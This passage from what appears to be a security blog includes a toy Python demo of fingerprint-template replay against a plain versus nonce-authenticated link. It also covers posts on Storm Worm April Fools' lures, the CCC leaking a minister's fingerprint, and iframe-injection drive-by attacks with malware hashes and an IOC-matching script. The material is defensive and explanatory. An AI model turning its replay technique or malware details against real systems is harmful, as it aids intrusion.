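        if nonce not in self.issued or nonce in self.used:
            return False
        expected = hmac.new(DEVICE_KEY, nonce + template, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False
        self.used.add(nonce)
        self.issued.discard(nonce)
        return hmac.compare_digest(template, self.enrolled)


def scanner_send_plain(template):
    return template


def scanner_send_auth(nonce, template):
    tag = hmac.new(DEVICE_KEY, nonce + template, hashlib.sha256).digest()
    return nonce, template, tag


def demo():
    template = b"constructed fingerprint template bytes"
    server = Server(template)

    # A biologger on the wire stores the plaintext message...
    captured = scanner_send_plain(template)
    # ...and replays it later: the legacy server accepts it.
    replay_plain = server.verify_plain(captured)

    # Authenticated link: the first, legitimate message is accepted.
    nonce1 = server.challenge()
    message = scanner_send_auth(nonce1, template)
    first = server.verify_auth(*message)
    # Replaying the exact same capture fails: nonce1 is already consumed.
    replay_auth = server.verify_auth(*message)
    # Splicing the captured tag onto a fresh nonce fails: tag was bound to nonce1.
    nonce2 = server.challenge()
    forged = server.verify_auth(nonce2, template, message[2])

    return replay_plain, first, replay_auth, forged


if __name__ == "__main__":
    print(demo())
```

The caveat Lewis himself gives still stands: the authenticated channel stops wire replay, not an attacker who uses the captured raw image to build a finger, so it has to be combined with liveness detection at the sensor, and a device key that a local attacker can read out of the scanner buys you nothing.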

April Fool's Day is newest theme for Storm Worm



Of course, any 'event' of importance will be used to lure users into opening attachments and clicking links. So educate your peers!!!


The miscreants behind the Storm Worm botnet have taken advantage of April Fools' day in a bid to infect more Windows PCs.

Security firms are warning users to avoid the temptation to click on April Fools' day emails that may redirect them to maliciously constructed websites.


The latest attempt to dupe more gullible users into getting their PCs infected kicked off on Monday with a spam campaign designed to trick recipients into visiting websites under the control of hackers containing executables with names such as foolsday.exe, Kickme.exe or funny.exe.

So far the miscreants punting the scam haven't even bothered to include exploit code, net security firm F-Secure notes. Potential marks are simply invited to download the malware, promoted via a spam mail campaign. (Source: TheRegister)

So was the campaign successful? I just had a look at the graphs from Shadowserver and it doesn't seem to be the case, at least for Tuesday the first. But March was a very successful month for botnet herders. I predict that there will be more attempts at using the Olympics as a tactic this year.

Tuesday

Let's make huge databases of fingerprints or maybe not?



Karim Vaes posted an interesting blog post about biometrics. Biometrics are not bad; just using fingerprints can be a problem, because you leave them behind everywhere.

And the timing of his post turned out to be bittersweet. A few hours later, news of the CCC (Chaos Computer Club) publishing the fingerprint of the German interior minister started circulating, as a protest against biometric data. From the Identity and Privacy blog:

I think it’s a stark reminder that some biometrics- such as a person’s fingerprints- are reasonably easy to get. And, once compromised, the person can’t ring up a help desk and get a new one (like they can passwords).

The current story revolves around Germany’s interior minister, Wolfgang Schauble. He is apparently quite vocal about collecting and using biometrics to fight terrorism, including storing them in ePassports.

In the most recent issue of Die Datenschleuder, activists under the name of Chaos Computer Club (”Europe’s largest hacker group”) printed the image of, what they claim, is the fingerprint of his index finger.

The fingerprint, on a plastic foil that leaves fingerprints when it is pressed against biometric readers, is included in the 4,000 copies of the latest issue of the magazine. Schauble’s fingerprint was said to be captured off a water glass he used last summer while participating in a public discussion at a University in Berlin.

If a person’s fingerprints are “in the wild” then they are a far less reliable way to authenticate the person for his/her whole life. If enough fingerprints are similarly widely available- whether by accident or deliberately- it will be enough to make fingerprinting almost useless.


More drive-by infections and iframe SEO poisoning



High-ranking sites are still a target for malicious code injection. Last week, the site euroticketshop.com, reselling tickets for the Euro 2008 soccer matches, put visitors at risk of a drive-by infection.
The attackers are really ramping up and more sites are falling victim:

USAToday.com, ABCNews.com, News.com, Target.com, Packard Bell.com, Walmart.com, Rediff.com, MiamiHerald.com, Bloomingdales.com, PatentStorm.us, WebShots.com, Sears.com, Forbes.com, Ugo.com, Bartleby.com, Linkedwords.com, Circuitcity.com, Allwords.com, Blogdigger.com, Epinions.com, Buyersindex.com, Jcpenney.com, Nakido.com, Uvm.edu, hobbes.nmsu.edu, jurist.law.pitt.edu, boisestate.edu.

So how good are our virus scanners against the embedded malware?

Scanners Result: 12/32 (37.5%)
Suspicious:W32/Malware!Gemini; W32/BHO.BVW
File size: 107536 bytes
MD5: e50f2c9874a128d4c15e72d26c78352c
SHA1: 91f8a0e2531ea63ce22d0c7f90e7366a78ebeb8a

Scanners Result: 2/32 (6.25%)
JS.Feebs.rv; JS/Feebs.gen2 @ MM
File size: 16098 bytes
MD5: 64bbd8ba8a0c9ce009d19f5b8c9d426e
SHA1: 1b313198ef140d2c74f36aa84c13afe9497865b6

Scanners Result: 11/32 (34.38%)
Trojan.Crypt.AN; FraudTool.Win32.UltimateDefender.cm
File size: 61440 bytes
MD5: 5d83515199803e1fbcd3d2d8e0cd4ce5
SHA1: 4c1f0eba4be895cf3b018e41fa7f13523424874d


Hmmm..... a very gloomy picture, but it doesn't surprise me.
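With detection rates like these, the hashes in the scanner summaries above are worth more than the AV verdicts: if you run one of the listed sites, or were redirected through one, you can check downloaded files against them directly. The script below is an added example, not code from the original post: it parses the three summary blocks as quoted on this page (copied into the IOC_TEXT string) and hashes file bytes against them. It drops malformed digests rather than matching on them, and reports when a hash hit disagrees with the listed file size, which would mean the IOC entry itself is inconsistent. The bytes hashed in demo() and the planted IOC entry are constructed.

```python
"""Added example, not code from the original post: a parser for the
scanner-summary blocks quoted above plus an MD5/SHA1 lookup against them.
IOC_TEXT is a copy of the three summaries on this page; the bytes in demo()
and the 'planted' entry are constructed for the test."""
import hashlib
import re

IOC_TEXT = """
Scanners Result: 12/32 (37.5%)
Suspicious:W32/Malware!Gemini; W32/BHO.BVW
File size: 107536 bytes
MD5: e50f2c9874a128d4c15e72d26c78352c
SHA1: 91f8a0e2531ea63ce22d0c7f90e7366a78ebeb8a

Scanners Result: 2/32 (6.25%)
JS.Feebs.rv; JS/Feebs.gen2 @ MM
File size: 16098 bytes
MD5: 64bbd8ba8a0c9ce009d19f5b8c9d426e
SHA1: 1b313198ef140d2c74f36aa84c13afe9497865b6

Scanners Result : 11/32 (34.38%)
Trojan.Crypt.AN; FraudTool.Win32.UltimateDefender.cm
File size: 61440 bytes
MD5: 5d83515199803e1fbcd3d2d8e0cd4ce5
SHA1: 4c1f0eba4be895cf3b018e41fa7f13523424874d
"""

_RESULT = re.compile(r"Scanners\s+Result\s*:\s*(\d+)\s*/\s*(\d+)", re.I)
_SIZE = re.compile(r"File\s+size\s*:\s*(\d+)", re.I)
_HASH = re.compile(r"(MD5|SHA1)\s*:\s*([0-9a-fA-F]+)", re.I)
_HEXLEN = {"md5": 32, "sha1": 40}


def parse_ioc_blocks(text):
    """Split on blank lines; each block yields detection count, engine count,
    detection names, file size and the hashes. A digest of the wrong length
    is dropped so a typo in the summary cannot produce a false match."""
    blocks = []
    for raw in re.split(r"\n\s*\n", text.strip()):
        block = {"names": []}
        for line in raw.splitlines():
            line = line.strip()
            if not line:
                continue
            m = _RESULT.match(line)
            if m:
                block["detected"], block["engines"] = int(m.group(1)), int(m.group(2))
                block["rate"] = block["detected"] / block["engines"]
                continue
            m = _SIZE.match(line)
            if m:
                block["size"] = int(m.group(1))
                continue
            m = _HASH.match(line)
            if m:
                algo, digest = m.group(1).lower(), m.group(2).lower()
                if len(digest) == _HEXLEN[algo]:
                    block[algo] = digest
                continue
            # Remaining line: detection names, with a scanner category prefix
            # such as "Suspicious:" stripped off.
            names = re.sub(r"^[A-Za-z]+:\s*", "", line)
            block["names"] = [n.strip() for n in names.split(";") if n.strip()]
        blocks.append(block)
    return blocks


def hash_bytes(data):
    return {"md5": hashlib.md5(data).hexdigest(), "sha1": hashlib.sha1(data).hexdigest()}


def match_iocs(data, blocks):
    """Return the IOC blocks whose MD5 or SHA1 equals that of data, noting
    whether the listed file size agrees with the data actually hashed."""
    digests = hash_bytes(data)
    hits = []
    for block in blocks:
        if any(block.get(algo) == digests[algo] for algo in ("md5", "sha1")):
            hit = dict(block)
            hit["size_ok"] = block.get("size") in (None, len(data))
            hits.append(hit)
    return hits


def demo():
    blocks = parse_ioc_blocks(IOC_TEXT)
    clean = b"constructed, benign test bytes"
    # Constructed IOC entry for the test bytes, with a deliberately wrong size.
    planted = {"names": ["Test.Planted"], "md5": hashlib.md5(clean).hexdigest(), "size": 1}
    return blocks, match_iocs(clean, blocks), match_iocs(clean, blocks + [planted])


if __name__ == "__main__":
    for block in demo()[0]:
        print(block["detected"], "/", block["engines"], block["names"], block["md5"])
```

Run it over everything the site served from the injected IFRAME path (or everything in a victim's browser cache); a hit on MD5 or SHA1 is conclusive for these exact samples, but a miss proves nothing, since the page itself notes that new pieces of malware keep being introduced.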

For the time being, Google is actively filtering the results, in fact removing the cached pages on a number of domains when I last checked. The practice makes it both difficult to assess how many and which sites are actually affected, and of course undermines the SEO poisoning, as without it the input validation issues and the injected IFRAMEs would never have been able to attract traffic in the first place.

The attack is now continuing: starting two weeks ago, the main IPs behind the IFRAMEs are still active, new pieces of malware and rogue software are introduced, hosting for which is still courtesy of the RBN, and we're definitely going to see many other sites with high page ranks targeted by a single massive SEO poisoning in combination with IFRAME injections. Which site is next? Let's hope not yours, as if you don't take care of your web application vulnerabilities, someone else will.
Read the full analysis by Dancho Danchev with the IP blocks of the hosted malware and the juicy details.
So for the affected (infected) websites: upgrade your security and do input validation!!! End users: make sure your systems are patched and up-to-date. And I don't mean just Microsoft patches, but your browser plugins too. Check here.
